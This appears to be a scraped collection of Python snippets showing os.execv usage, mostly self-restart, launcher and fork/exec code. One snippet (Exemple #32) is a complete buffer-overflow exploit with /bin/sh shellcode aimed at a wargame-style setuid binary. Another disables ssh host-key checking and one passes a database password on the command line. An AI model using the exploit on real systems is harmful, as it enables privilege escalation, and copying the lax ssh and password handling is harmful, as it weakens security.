def restart(self):
     python = self.find_desired_python()
     sys.stderr.write('NOTE: %s switching to %s\n' %
                      (os.path.basename(sys.argv[0]), python))
     sys.argv.insert(0, '-u')
     sys.argv.insert(0, python)
     os.execv(sys.argv[0], sys.argv)
Exemple #2
0
    def step_1_end(self):
        # END OF Step 1 in Upgrade
        self.log("STEP 1 COMPLETED", "GUI")
        self.ps.progress.setFormat(_("Step 1 Completed"))

        # STEP 1 Finishes at 10 percent
        self.ps.progress.setValue(10)

        # Write selected upgrade repository to a temporary file
        try:
            file('/tmp/target_repo','w').write(self.target_repo)
        except:
            self.log("TARGET REPO STORE FAILED, USING stable AS DEFAULT", "GUI")

        # Mark the step
        self.logger.markStep(2)

        # Cleanup Pisi DB
        cleanup_pisi()

        # Just wait a little bit.
        time.sleep(2)

        # Re-launch the um for 2. step
        os.execv('/usr/bin/upgrade-manager', ['/usr/bin/upgrade-manager', '--start-from-step2'])
Exemple #3
0
    def method_exec(self, space, args_w):
        if len(args_w) > 1 and space.respond_to(args_w[0], space.newsymbol("to_hash")):
            raise space.error(space.w_NotImplementedError, "exec with environment")

        if len(args_w) > 1 and space.respond_to(args_w[-1], space.newsymbol("to_hash")):
            raise space.error(space.w_NotImplementedError, "exec with options")

        if space.respond_to(args_w[0], space.newsymbol("to_ary")):
            w_cmd = space.convert_type(args_w[0], space.w_array, "to_ary")
            cmd, argv0 = [
                space.str0_w(space.convert_type(w_e, space.w_string, "to_str")) for w_e in space.listview(w_cmd)
            ]
        else:
            w_cmd = space.convert_type(args_w[0], space.w_string, "to_str")
            cmd = space.str0_w(w_cmd)
            argv0 = None

        if len(args_w) > 1 or argv0 is not None:
            if argv0 is None:
                sepidx = cmd.rfind(os.sep) + 1
                if sepidx > 0:
                    argv0 = cmd[sepidx:]
                else:
                    argv0 = cmd
            args = [argv0]
            args += [space.str0_w(space.convert_type(w_arg, space.w_string, "to_str")) for w_arg in args_w[1:]]
            os.execv(cmd, args)
        else:
            shell = os.environ.get("RUBYSHELL") or os.environ.get("COMSPEC") or "/bin/sh"
            sepidx = shell.rfind(os.sep) + 1
            if sepidx > 0:
                argv0 = shell[sepidx:]
            else:
                argv0 = shell
            os.execv(shell, [argv0, "-c", cmd])
    def from_introspection(self):
        """ Initialise the configuration by introspecting the system. """

        from PyQt4 import QtCore

        inform("PyQt %s is being used." % QtCore.PYQT_VERSION_STR)
        inform("Qt %s is being used." % QtCore.QT_VERSION_STR)

        # See if we have a PyQt4 that embeds its configuration.
        try:
            pyqt_config = QtCore.PYQT_CONFIGURATION
        except AttributeError:
            pyqt_config = None

        # FIXME: During development.
        pyqt_config = dict(sip_flags='-x VendorID -t WS_MACX -x PyQt_NoPrintRangeBug -t Qt_4_8_3')

        if pyqt_config is None:
            # Fallback to the old configuration script.
            # FIXME: When the scripts are renamed.
            config_script = sys.argv[0].replace('configure-ng', 'configure')
            args = [sys.executable, config_script] + sys.argv[1:]

            try:
                os.execv(sys.executable, args)
            except OSError:
                pass

            error("Unable to execute '%s'\n" % config_script)

        self.pyqt_sip_flags = pyqt_config['sip_flags']
Exemple #5
0
    def _connect_stack(self, stack_id, connector_id):
        # Get the IP and default user information for this connector.
        payload = {"uuid": stack_id}
        try:
            res = requests.get(self.ferry_server + "/stack", params=payload)
            json_value = json.loads(str(res.text))
        except ConnectionError:
            logging.error("could not connect to ferry server")
            return "It appears Ferry servers are not running.\nType sudo ferry server and try again."

        connector_ip = None
        for cg in json_value["connectors"]:
            if not connector_id:
                connector_ip = cg["entry"]["ip"]
                break
            elif connector_id == cg["uniq"]:
                connector_ip = cg["entry"]["ip"]
                break
            else:
                logging.warning("no match: %s %s" % (connector_id, cg["uniq"]))

        # Now form the ssh command. This just executes in the same shell.
        if connector_ip:
            key_opt = "-o StrictHostKeyChecking=no"
            host_opt = "-o UserKnownHostsFile=/dev/null"
            ident = "-i %s/id_rsa" % self._read_key_dir()
            dest = "%s@%s" % (self.default_user, connector_ip)
            cmd = "ssh %s %s %s %s" % (key_opt, host_opt, ident, dest)
            logging.warning(cmd)
            os.execv("/usr/bin/ssh", cmd.split())
def _reload():
    global _reload_attempted
    _reload_attempted = True
    for fn in _reload_hooks:
        fn()
    if hasattr(signal, "setitimer"):
        # Clear the alarm signal set by
        # ioloop.set_blocking_log_threshold so it doesn't fire
        # after the exec.
        signal.setitimer(signal.ITIMER_REAL, 0, 0)
    if sys.platform == 'win32':
        # os.execv is broken on Windows and can't properly parse command line
        # arguments and executable name if they contain whitespaces. subprocess
        # fixes that behavior.
        subprocess.Popen([sys.executable] + sys.argv)
        sys.exit(0)
    else:
        try:
            os.execv(sys.executable, [sys.executable] + sys.argv)
        except OSError:
            # Mac OS X versions prior to 10.6 do not support execv in
            # a process that contains multiple threads.  Instead of
            # re-executing in the current process, start a new one
            # and cause the current process to exit.  This isn't
            # ideal since the new process is detached from the parent
            # terminal and thus cannot easily be killed with ctrl-C,
            # but it's better than not being able to autoreload at
            # all.
            # Unfortunately the errno returned in this case does not
            # appear to be consistent, so we can't easily check for
            # this error specifically.
            os.spawnv(os.P_NOWAIT, sys.executable,
                      [sys.executable] + sys.argv)
            sys.exit(0)
Exemple #7
0
def server_start(myid):
    """
    Start the zookeeper server

    @param myid - the id of the zookeeper server in the ensemble
    """
    install_dir = os.environ.get('INSTALLDIR')

    classpath = ':'.join([
        "/etc/zookeeper",
        "/usr/share/java/slf4j/slf4j-log4j12.jar",
        "/usr/share/java/slf4j/slf4j-api.jar",
        "/usr/share/java/netty.jar",
        "/usr/share/java/log4j.jar",
        "/usr/share/java/jline.jar",
        "/usr/share/java/zookeeper/zookeeper.jar"])

    log4j_path = os.path.join("%s/etc/zookeeper/" % (install_dir), "log4j-%d.properties" % (myid,))
    import socket
    with open(log4j_path, "w") as log4j:
            log4j.write("""
# DEFAULT: console appender only
log4j.rootLogger=INFO, ZLOG
log4j.appender.ZLOG.layout=org.apache.log4j.PatternLayout
log4j.appender.ZLOG.layout.ConversionPattern=%d{ISO8601} [""" + socket.getfqdn()  +"""] - %-5p [%t:%C{1}@%L] - %m%n
log4j.appender.ZLOG=org.apache.log4j.RollingFileAppender
log4j.appender.ZLOG.Threshold=DEBUG
log4j.appender.ZLOG.File=""" + to_java_compatible_path(  # NOQA
                "%s/zk/server-%d/log" % (install_dir, myid) + os.sep + "zookeeper.log\n"))


    argv = [
        '/usr/bin/java',
        '-cp',
        classpath,
        #'-Dlog4j.debug',
        '-Dzookeeper.log.dir="%s"' % (install_dir,),
        '-Dlog4j.configuration=file:%s' % log4j_path,
        '-Dcom.sun.management.jmxremote',
        '-Dcom.sun.management.jmxremote.local.only=false',
        'org.apache.zookeeper.server.quorum.QuorumPeerMain',
        '%s/etc/zookeeper/server-%d.cfg' % (install_dir, myid),
    ]

    print('Running zookeeper: %s' %  (' '.join(argv),))

    pid = os.fork()
    if pid < 0:
        raise OSError("Failed to fork")
    elif pid == 0:
        # instruct the child process to TERM when the parent dies
        import ctypes
        libc = ctypes.CDLL('/lib64/libc.so.6')
        PR_SET_PDEATHSIG = 1; TERM = 15
        libc.prctl(PR_SET_PDEATHSIG, TERM)

        os.execv(argv[0], argv)

        # Should never reach here CRASH
        raise OSError("execv() failed")
Exemple #8
0
def _Main(argv):
  opt = optparse.OptionParser(usage="repo wrapperinfo -- ...")
  opt.add_option("--repo-dir", dest="repodir",
                 help="path to .repo/")
  opt.add_option("--wrapper-version", dest="wrapper_version",
                 help="version of the wrapper script")
  opt.add_option("--wrapper-path", dest="wrapper_path",
                 help="location of the wrapper script")
  _PruneOptions(argv, opt)
  opt, argv = opt.parse_args(argv)

  _CheckWrapperVersion(opt.wrapper_version, opt.wrapper_path)
  _CheckRepoDir(opt.repodir)

  repo = _Repo(opt.repodir)
  try:
    try:
      repo._Run(argv)
    finally:
      close_ssh()
  except KeyboardInterrupt:
    sys.exit(1)
  except RepoChangedException, rce:
    # If repo changed, re-exec ourselves.
    #
    argv = list(sys.argv)
    argv.extend(rce.extra_args)
    try:
      os.execv(__file__, argv)
    except OSError, e:
      print >>sys.stderr, 'fatal: cannot restart repo after upgrade'
      print >>sys.stderr, 'fatal: %s' % e
      sys.exit(128)
Exemple #9
0
async def on_message(message):
	if client.sleeping:
		if message.content == '!wake':
			client.sleeping = False
			await client.send_message(message.channel, 'SolBot online!')
	else:
		if message.content == '!sleep':
			client.sleeping = True
			await client.send_message(message.channel, 'Going to sleep...')
		elif message.content == '!update':
			g = Git(os.path.dirname(os.path.abspath(__file__)))
			tmp = await client.send_message(message.channel, 'Pulling new code...')
			g.pull()
			await client.edit_message(tmp, 'Code pulled. Restarting...')
			client.logout()
			os.execv(sys.executable, ['python3.5'] + sys.argv)
		elif message.content == '!gitstatus':
			g = Git(os.path.dirname(os.path.abspath(__file__)))
			tmp = await client.send_message(message.channel, 'Checking status...')
			g.fetch()
			p = re.compile('Your branch is.*by (\d+) commits.*')
			m = p.match(g.status())
			if m:
				await client.edit_message(tmp, 'I am behind by {} commits'.format(m.group(1)))
			else:
				await client.edit_message(tmp, 'I am up to date!')
def resolve_deps(repodir, level=0, self_update=True, overrideroots=None, skipdependencies=set()):
    config = read_deps(repodir)
    if config is None:
        if level == 0:
            logging.warning('No dependencies file in directory %s, nothing to do...\n%s' % (repodir, USAGE))
        return
    if level >= 10:
        logging.warning('Too much subrepository nesting, ignoring %s' % repo)
        return

    if overrideroots is not None:
        config['_root'] = overrideroots

    for dir, sources in sorted(config.iteritems()):
        if (dir.startswith('_') or
            skipdependencies.intersection([s[0] for s in sources if s[0]])):
            continue

        target = safe_join(repodir, dir)
        parenttype = get_repo_type(repodir)
        _root = config.get('_root', {})

        for key in sources.keys() + _root.keys():
            if key == parenttype or key is None and vcs != '*':
                vcs = key
        source, rev = merge_seqs(sources.get('*'), sources.get(vcs))

        if not (vcs and source and rev):
            logging.warning('No valid source / revision found to create %s' % target)
            continue

        ensure_repo(repodir, parenttype, target, vcs, _root.get(vcs, ''), source)
        update_repo(target, vcs, rev)
        resolve_deps(target, level + 1, self_update=False,
                     overrideroots=overrideroots, skipdependencies=skipdependencies)

    if self_update and '_self' in config and '*' in config['_self']:
        source = safe_join(repodir, config['_self']['*'])
        try:
            with io.open(source, 'rb') as handle:
                sourcedata = handle.read()
        except IOError as e:
            if e.errno != errno.ENOENT:
                raise
            logging.warning("File %s doesn't exist, skipping self-update" % source)
            return

        target = __file__
        with io.open(target, 'rb') as handle:
            targetdata = handle.read()

        if sourcedata != targetdata:
            logging.info("Updating %s from %s, don't forget to commit" % (target, source))
            with io.open(target, 'wb') as handle:
                handle.write(sourcedata)
            if __name__ == '__main__':
                logging.info('Restarting %s' % target)
                os.execv(sys.executable, [sys.executable, target] + sys.argv[1:])
            else:
                logging.warning('Cannot restart %s automatically, please rerun' % target)
Exemple #11
0
def main():
    SPARK_HOME = getSparkHome()

    sparkSubmit = os.path.join(SPARK_HOME, 'bin', 'pyspark')

    # add python script
    os.environ['PYTHONSTARTUP'] = os.path.join(os.path.dirname(os.path.realpath(ts2.__file__)), 'util', 'launch.py')

    # add ETL configuration
    os.environ['ETL_CONFIG'] = sys.argv[1]

    thunderStreamingJar = findThunderStreamingJar()
    #hbaseJars = findHBaseJars()
    #otherJars = findOtherJars()
	
    #jarList = thunderStreamingJar + hbaseJars + otherJars
    jarList = thunderStreamingJar

    jars = ['--jars', ','.join(jarList)]
    driver_classpath = ['--driver-class-path', ':'.join(jarList)]

    retvals = []
    retvals.extend(jars)
    retvals.extend(driver_classpath)

    print "retvals: %s" % str(retvals) 

    os.execv(sparkSubmit, retvals)
Exemple #12
0
def _RunGdb(device, package_name, debug_process_name, pid, output_directory,
            target_cpu, extra_args, verbose):
  if not pid:
    debug_process_name = _NormalizeProcessName(debug_process_name, package_name)
    pid = device.GetApplicationPids(debug_process_name, at_most_one=True)
  if not pid:
    logging.warning('App not running. Sending launch intent.')
    _LaunchUrl([device], package_name)
    pid = device.GetApplicationPids(debug_process_name, at_most_one=True)
    if not pid:
      raise Exception('Unable to find process "%s"' % debug_process_name)

  gdb_script_path = os.path.dirname(__file__) + '/adb_gdb'
  cmd = [
      gdb_script_path,
      '--package-name=%s' % package_name,
      '--output-directory=%s' % output_directory,
      '--adb=%s' % adb_wrapper.AdbWrapper.GetAdbPath(),
      '--device=%s' % device.serial,
      '--pid=%s' % pid,
      # Use one lib dir per device so that changing between devices does require
      # refetching the device libs.
      '--pull-libs-dir=/tmp/adb-gdb-libs-%s' % device.serial,
  ]
  # Enable verbose output of adb_gdb if it's set for this script.
  if verbose:
    cmd.append('--verbose')
  if target_cpu:
    cmd.append('--target-arch=%s' % _TargetCpuToTargetArch(target_cpu))
  cmd.extend(extra_args)
  logging.warning('Running: %s', ' '.join(pipes.quote(x) for x in cmd))
  print _Colorize(
      'All subsequent output is from adb_gdb script.', colorama.Fore.YELLOW)
  os.execv(gdb_script_path, cmd)
def main():
    args = parse_args()

    program = args.program
    if not os.path.isabs(program):
        # program uses a relative path: try to find the absolute path
        # to the executable
        if sys.version_info >= (3, 3):
            import shutil
            program_abs = shutil.which(program)
        else:
            import distutils.spawn
            program_abs = distutils.spawn.find_executable(program)
        if program_abs:
            program = program_abs

    for arg_name, rlimit in RESOURCES:
        value = getattr(args, arg_name)
        if value is None:
            continue
        try:
            resource.setrlimit(rlimit, (value, value))
        except ValueError as exc:
            print("%s: failed to set the %s resource limit: %s"
                  % (USAGE_PROGRAM, arg_name.upper(), exc),
                  file=sys.stderr)
            sys.exit(1)

    try:
        os.execv(program, [program] + args.program_args)
    except Exception as exc:
        print("%s: failed to execute %s: %s"
              % (USAGE_PROGRAM, program, exc),
              file=sys.stderr)
        sys.exit(1)
Exemple #14
0
	def start(self):
		assert self.pid is None
		def pipeOpen():
			readend,writeend = os.pipe()
			readend = os.fdopen(readend, "r")
			writeend = os.fdopen(writeend, "w")
			return readend,writeend
		self.pipe_c2p = pipeOpen()
		self.pipe_p2c = pipeOpen()
		pid = os.fork()
		if pid == 0: # child
			self.pipe_c2p[0].close()
			self.pipe_p2c[1].close()
			# Copying all parameters is problematic (e.g. --pyshell).
			# sys.argv[0] is never "python", so it might be problematic
			# if it is not executable. However, it should be.
			args = sys.argv[0:1] + [
				"--forkExecProc",
				str(self.pipe_c2p[1].fileno()),
				str(self.pipe_p2c[0].fileno())]
			os.execv(args[0], args)
		else: # parent
			self.pipe_c2p[1].close()
			self.pipe_p2c[0].close()
			self.pid = pid
			self.pickler = Pickler(self.pipe_p2c[1])
			self.pickler.dump(self.name)
			self.pickler.dump(self.target)
			self.pickler.dump(self.args)
			self.pipe_p2c[1].flush()
Exemple #15
0
 def restart(self):
     if self.connected:
         self.quit("Restarting.")
     else:
         self.save_config()
         self.state.close()
     os.execv(sys.executable, [sys.executable] + sys.argv)
Exemple #16
0
def background(cmdline, exit_callback=None):
    """
	Fork and execute a process specified by cmdline.  If successful, this 
	returns the pid of the newly spawned process.  If specified, bind a 
	callback to execute when the process exits.
	"""
    global handler_init
    global running_pids
    if not handler_init:
        init_sigchld_handler()
    pid = os.fork()
    if pid:
        if exit_callback:
            exit_callbacks[pid] = exit_callback
        running_pids[pid] = True
        return pid

    close_stdout_stderr()

    if type(cmdline) == type([]):
        args = cmdline
    else:
        args = cmdline.split()
    os.execv(args[0], args)
    # should never happen
    assert False, "exec failed"
Exemple #17
0
 def loop(t, f):
     if f():
         reactor.callLater(t, loop, t, f)
     else:
         logger.info("Reloading...")
         reactor.stop()
         os.execv(sys.argv[0], sys.argv)
Exemple #18
0
def run_as_root(args, stdin=None):
    if stdin is not None:
        pipe_r, pipe_w = os.pipe()
    else:
        pipe_r, pipe_w = None, None

    pid = os.fork()
    if pid == 0:
        if pipe_r is not None:
            # setup stdin pipe
            os.dup2(pipe_r, 0)
            os.close(pipe_r)
            os.close(pipe_w)

        os.seteuid(0)
        os.setuid(0)
        try:
            os.execv(args[0], args)
        except:
            os._exit(127)
    else:
        if pipe_r is not None:
            os.close(pipe_r)
            os.write(pipe_w, stdin)
            os.close(pipe_w)
        wpid, sts = os.waitpid(pid, 0)
        code = sts_result(sts)
        if code != 0:
            raise MyException("%r: exited with result %d"% (args, code))
Exemple #19
0
    def update_callback(msg):
        # executes in logic thread
        # well, intented to be
        # ui and logic now run in the same thread.

        from options import options
        if msg == 'up2date':
            ui_schedule(sss.switch)
        elif msg == 'update_disabled' and options.fastjoin:
            import gevent
            def func():
                from client.ui.soundmgr import SoundManager
                SoundManager.mute()
                gevent.sleep(0.3)
                ui_schedule(sss.switch)
                gevent.sleep(0.3)
                Executive.call('connect_server', ui_message, ('127.0.0.1', 9999), ui_message)
                gevent.sleep(0.3)
                Executive.call('auth', ui_message, ['Proton1', 'abcde'])
                gevent.sleep(0.3)
                Executive.call('quick_start_game', ui_message, 'THBattle')
                gevent.sleep(0.3)
                Executive.call('get_ready', ui_message, [])

            gevent.spawn(func)
                
        elif msg in errmsgs:
            ui_schedule(display_box, errmsgs[msg])
        else:
            os.execv(sys.executable, [sys.executable] + sys.argv)
Exemple #20
0
def main(regrtest_args):
    args = [sys.executable,
            '-W', 'default',      # Warnings set to 'default'
            '-bb',                # Warnings about bytes/bytearray
            '-E',                 # Ignore environment variables
            ]
    # Allow user-specified interpreter options to override our defaults.
    args.extend(test.support.args_from_interpreter_flags())

    # Workaround for issue #20355
    os.environ.pop("PYTHONWARNINGS", None)
    # Workaround for issue #20361
    args.extend(['-W', 'error::BytesWarning'])

    args.extend(['-m', 'test',    # Run the test suite
                 '-r',            # Randomize test order
                 '-w',            # Re-run failed tests in verbose mode
                 ])
    if sys.platform == 'win32':
        args.append('-n')         # Silence alerts under Windows
    if threading and not any(is_multiprocess_flag(arg) for arg in regrtest_args):
        args.extend(['-j', '0'])  # Use all CPU cores
    if not any(is_resource_use_flag(arg) for arg in regrtest_args):
        args.extend(['-u', 'all,-largefile,-audio,-gui'])
    args.extend(regrtest_args)
    print(' '.join(args))
    os.execv(sys.executable, args)
def invoke_gcc_arm_embedded(args):
  os_name = utils.GuessOS()
  if os_name == "macos":
    os_name = "mac"
    # There is no way of disabling the passing of '-arch x86_64' from the
    # files generated by gyp on Mac.
    args.remove("-arch")
    args.remove("x86_64")
    # There is no way of disabling the passing of '-mpascal-strings' from the
    # files generated by gyp on Mac.
    if "-mpascal-strings" in args:
      args.remove("-mpascal-strings")

  gcc_arm_embedded_bin = relative_to_dartino_root(
    "third_party", "gcc-arm-embedded", os_name, "gcc-arm-embedded", "bin",
    "arm-none-eabi-gcc")
  if not os.path.exists(gcc_arm_embedded_bin):
    gcc_arm_embedded_download = relative_to_dartino_root(
      "third_party", "gcc-arm-embedded", "download")
    print "\n*************** TOOLCHAIN ERROR ********************"
    print "%s not found" % gcc_arm_embedded_bin
    print "Run %s to download\n" % gcc_arm_embedded_download
    exit(1)
  args.insert(0, gcc_arm_embedded_bin)
  os.execv(gcc_arm_embedded_bin, args)
Exemple #22
0
 def start(self, command):
     if self.using_pty:
         if pty is None: # Encountered ImportError
             sys.exit("You indicated pty=True, but your platform doesn't support the 'pty' module!") # noqa
         self.pid, self.parent_fd = pty.fork()
         # If we're the child process, load up the actual command in a
         # shell, just as subprocess does; this replaces our process - whose
         # pipes are all hooked up to the PTY - with the "real" one.
         if self.pid == 0:
             # Use execv for bare-minimum "exec w/ variable # args"
             # behavior. No need for the 'p' (use PATH to find executable)
             # or 'e' (define a custom/overridden shell env) variants, for
             # now.
             # TODO: use /bin/sh or whatever subprocess does. Only using
             # bash for now because that's what we have been testing
             # against.
             # TODO: also see if subprocess is using equivalent of execvp...
             # TODO: both pty.spawn() and pexpect.spawn() do a lot of
             # setup/teardown involving tty.*, setwinsize, getrlimit,
             # signal. Ostensibly we'll want some of that eventually, but if
             # possible write tests - integration-level if necessary -
             # before adding it!
             os.execv('/bin/bash', ['/bin/bash', '-c', command])
     else:
         self.process = Popen(
             command,
             shell=True,
             stdout=PIPE,
             stderr=PIPE,
         )
Exemple #23
0
def mysql(site=None):
	import webnotes 
	import commands, os
	msq = commands.getoutput('which mysql')
	webnotes.init(site=site)
	os.execv(msq, [msq, '-u', webnotes.conf.db_name, '-p'+webnotes.conf.db_password, webnotes.conf.db_name, '-h', webnotes.conf.db_host or "localhost", "-A"])
	webnotes.destroy()
Exemple #24
0
def restart(l, b, i):
    """
    !d Restart $nick$
    !a [message...]
    !r administrator
    """
    if i.args is None:
        quotes = [
            '(Terminator voice) I\'ll be back.',
            'I\'ll be back in a jiffy!',
            'brb',
            'I\'ll be right back, homies',
            ]
        choice = random.randint(1, len(quotes)) - 1
        b.l_say(BOLD+quotes[choice], i, 3)
    else:
        b.say(' '.join(i.args).capitalize(), channel='all')
    b.exit()
    print '\n' * 5

    args = sys.argv[:]
    args.insert(0, sys.executable)
    if sys.platform == 'win32':
        args = ['"%s"' % arg for arg in args]
    os.execv(sys.executable, args)
 def restart(self):
     reactor.disconnectAll()
     import sys
     import os
     argv = [ sys.executable ]
     argv.extend(sys.argv)
     os.execv(sys.executable, argv)
Exemple #26
0
def restart():
    """ Restarts the game with original command line arguments. Those may over-
    write options set at Options Screen. This is by design"""
    executable = sys.executable
    args = list(sys.argv)
    args.insert(0, executable)
    os.execv(executable, args)
Exemple #27
0
	def start(self):
		assert self.pid is None
		def pipeOpen():
			readend,writeend = os.pipe()
			readend = os.fdopen(readend, "r")
			writeend = os.fdopen(writeend, "w")
			return readend,writeend
		self.pipe_c2p = pipeOpen()
		self.pipe_p2c = pipeOpen()
		pid = os.fork()
		if pid == 0: # child
			self.pipe_c2p[0].close()
			self.pipe_p2c[1].close()
			args = sys.argv + [
				"--forkExecProc",
				str(self.pipe_c2p[1].fileno()),
				str(self.pipe_p2c[0].fileno())]
			os.execv(args[0], args)
		else: # parent
			self.pipe_c2p[1].close()
			self.pipe_p2c[0].close()
			self.pid = pid
			self.pickler = Pickler(self.pipe_p2c[1])
			self.pickler.dump(self.name)
			self.pickler.dump(self.target)
			self.pickler.dump(self.args)
			self.pipe_p2c[1].flush()
Exemple #28
0
def startNewTripGPS(whichTrip):
	##Need to halt myGpsPipe, then move "CURRENT.txt" into the current trip we are working on.
	#First must stop GPS pipe process
	p= subprocess.Popen(['ps','-A'],stdout=subprocess.PIPE)
	out,err=p.communicate()

	for line in out.splitlines():
		if 'myGpsPipe' in line:
			pid=int(line.strip().split(' ')[0])
			print 'myGpsPipe on pid='+str(pid)+',should kill'
			os.kill(pid,9)			#command is "kill -9 pid"
	
	#Process is killed, need to call nmeaLocation.py to parse for time,date,locations.
	os.system('/home/root/Documents/beagle-bone.git/NMEA/nmeaLocation.py')
	#Waits for return, then we can move the CURRENT.txt into the trip folder we want.
	mvCommand='mv '+boneGPSpath+'PARSED.txt '+boneGPSpath+str(whichTrip)+'.txt'
	rmCommand='rm '+boneGPSpath+'CURRENT.txt'
	os.system(mvCommand)
	os.system(rmCommand)
	filep=boneGPSpath+'.info'
	OF=open(filep,'w')
	OF.write(str(whichTrip))		#Which trip actually represents how many trips are there.
	OF.close()						

	#Restart myGpsPipe script.
	pid=os.fork()
	if pid==0:
		os.setpgid(0,0)
		args=['/home/root/Documents/beagle-bone.git/NMEA/myGpsPipe.py','']
		os.execv(args[0],args)
Exemple #29
0
def runIt():
    global childPid

    ws = nws.client.NetWorkSpace(key, serverHost=nwssHost, serverPort=int(nwssPort))
    LogI('Opened workspace %s on %s at %s.'%(key, nwssHost, nwssPort))

    jobTag = 'job %s'%jobIndex
    cmd = ws.fetch(jobTag)
    LogI('Fetched job: %s.'%cmd)
    try:    ws.deleteVar(jobTag)
    except: pass

    startTime = time.time()

    ecmd = ['/bin/bash', '-c', cmd]
    childPid = os.fork()
    if childPid == 0:
        # Create a new process group to simplify killing the child and its descendants.
        os.setpgrp()
        os.execv(ecmd[0], ecmd)

    LogI('Child %d started on %s at %f.'%(childPid, myHost, startTime))
    childExistsLock.release()

    while 1:
        (retpid, retval) = os.waitpid(childPid, 0)
        if retpid: break

    LogI('Child %d returned on %d.'%(childPid, retval))
    childExitedLock.release()
    ws.store('Job %s Status'%jobIndex, (retval, startTime, time.time(), 0, childPid, myHost))
    ws.store('shut down %s'%jobIndex, 0) # let the sentinel know that the child is done.
        
    runItDoneLock.release()
Exemple #30
0
def exec_python(args):
  """Executes a python process, replacing the current process if possible.

  On Windows, it returns the child process code. The caller must exit at the
  earliest opportunity.
  """
  cmd = [sys.executable] + args
  if sys.platform not in ('cygwin', 'win32'):
    os.execv(cmd[0], cmd)
    return 1

  try:
    # On Windows, we cannot sanely exec() so shell out the child process
    # instead. But we need to forward any signal received that the bot may care
    # about. This means processes accumulate, sadly.
    # TODO(maruel): If stdin closes, it tells the child process that the parent
    # process died.
    proc = subprocess42.Popen(cmd, detached=True, stdin=subprocess42.PIPE)
    def handler(sig, _):
      logging.info('Got signal %s', sig)
      # Always send SIGTERM, which is properly translated.
      proc.send_signal(signal.SIGTERM)

    sig = signal.SIGBREAK if sys.platform == 'win32' else signal.SIGTERM
    with subprocess42.set_signal_handler([sig], handler):
      proc.wait()
      return proc.returncode
  except Exception as e:
    logging.exception('failed to start: %s', e)
    # Swallow the exception.
    return 1
Exemple #31
0
def python(*args):
    os.execv(sys.executable, (sys.executable,) + args)
Exemple #32
0
import os
import struct

payload = ""
sfp = 0x804851e
shell = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80"
target = "/home/giant/assassin"
ret = 0xbffffbd4

def append(x):
    return payload + x

def p(x):
    return struct.pack("<L", x)

payload = append("\x90" * 44)
payload = append(p(sfp)) #ret
payload = append(p(ret))
payload = append("\x90"*100 + shell)

pid = os.fork()

if pid == 0:
    os.execv(target, (target, payload))
else:
    os.waitpid(pid, 0)
Exemple #33
0
def start():
    program = get_process_manager()
    if not program:
        raise Exception("No process manager found")
    os.execv(program, [program, 'start'])
Exemple #34
0
    if prognam == 'synctool_launch.py':
        print 'This program is used as a launcher for synctool'
        sys.exit(0)

    if prognam not in LAUNCH:
        stderr("launch: error: unknown program '%s'" % prognam)
        sys.exit(1)

    (prefix, bindir) = os.path.split(base)
    launch = os.path.join(prefix, 'sbin', LAUNCH[prognam])
    if not os.path.isfile(launch):
        stderr('launch: error: missing program %s' % launch)
        sys.exit(-1)

    libdir = os.path.join(prefix, 'lib')
    if not os.path.isdir(libdir):
        stderr('launch: error: no such directory: %s' % libdir)
        sys.exit(-1)

    os.environ['PYTHONPATH'] = libdir

    argv = sys.argv[1:]
    argv.insert(0, launch)

    os.execv(argv[0], argv)

    stderr('launch: error: failed to execute: %s' % argv[0])
    sys.exit(-1)

# EOB
Exemple #35
0
        os.chdir('/')

        # the child process gets the desired uid/gid
        os.setgid(run_as_gid)
        groups=[g.gr_gid for g in grp.getgrall() if username in g.gr_mem or username in g.gr_name]
        os.setgroups(groups)
        os.setuid(uid)

        # give this its own process group (which happens to be equal to its
        # pid)
        os.setpgrp()

        # Finally, exec the script
        try:
            oumask = os.umask(022)
            os.execv(script_path, [script_path, ])
            os.umask(oumask)
        finally:
            # Shouldn't reach this part - execv never returns
            os._exit(1)

    # Parent doesn't write to child, so close that part
    os.close(pipe_write)

    output = None
    timed_out = None

    out_stream = tempfile.TemporaryFile()

    while 1:
        select_wait = None
Exemple #36
0
        mod,
        "--permutations",
        permutations,
        "--method",
        method,
        "--zscore",
        zscore,
        "--pval",
        pval,
        "--num",
        num,
        "--input",
        os.path.join(here, "input_list"),
        "--denom",
        os.path.join(here, "denominator"),
        "--output",
        here,
        "--version",
        version,
        "--dataToAnalyze",
        dataToAnalyze,
    ]
    os.chdir(there)
    os.execv(args[0], args)
except os.error, e:
    print "Operating system error: %s" % str(e)
    raise SystemExit, 1

f.write("\n")
f.close()
Exemple #37
0
#!/usr/bin/env python

# Add phonelibs openblas to LD_LIBRARY_PATH if import fails
from common.basedir import BASEDIR
try:
    from scipy import spatial
except ImportError as e:
    import os
    import sys

    openblas_path = os.path.join(BASEDIR, "phonelibs/openblas/")
    os.environ['LD_LIBRARY_PATH'] += ':' + openblas_path

    args = [sys.executable]
    args.extend(sys.argv)
    os.execv(sys.executable, args)

DEFAULT_SPEEDS_BY_REGION_JSON_FILE = BASEDIR + "/selfdrive/mapd/default_speeds_by_region.json"
import default_speeds_generator
default_speeds_generator.main(DEFAULT_SPEEDS_BY_REGION_JSON_FILE)

import os
import sys
import time
import zmq
import threading
import numpy as np
import overpy
from collections import defaultdict

from common.params import Params
Exemple #38
0
def main(argv):
    pm = get_package_manager()
    pm_conf = pm.config

    # initialize config with defaults
    c = CLIConfig(pm_conf)

    # parse opts to get the config file
    (opts, args) = parse_options(argv)
    c.apply_optparse(opts)

    # do the config file parsing
    c.parse_configfiles()

    # and now reapply the options to override config file defaults
    c.apply_optparse(opts)
    opts = c.get_options()

    if not opts.pretend:
        try:
            import psutil

            def getproc(pid):
                for ps in psutil.get_process_list():
                    if pid == ps.pid:
                        return ps
                raise Exception()

            def getscriptname(ps):
                if os.path.basename(ps.cmdline[0]) != ps.name:
                    return ps.cmdline[0]
                cmdline = ps.cmdline[1:]
                while cmdline[0].startswith('-'):  # omit options
                    cmdline.pop(0)
                return os.path.basename(cmdline[0])

            ps = getproc(os.getppid())
            # traverse upstream to find the emerge process
            while ps.pid > 1:
                if getscriptname(ps) == 'emerge':
                    out.s1(
                        'Running under the emerge process, assuming --pretend.'
                    )
                    opts.pretend = True
                    break
                ps = ps.parent
        except Exception:
            pass

    if os.geteuid() != 0 and opts.unprivileged_user:
        if not opts.pretend:
            out.s1('Running as an unprivileged user, assuming --pretend.')
            opts.pretend = True
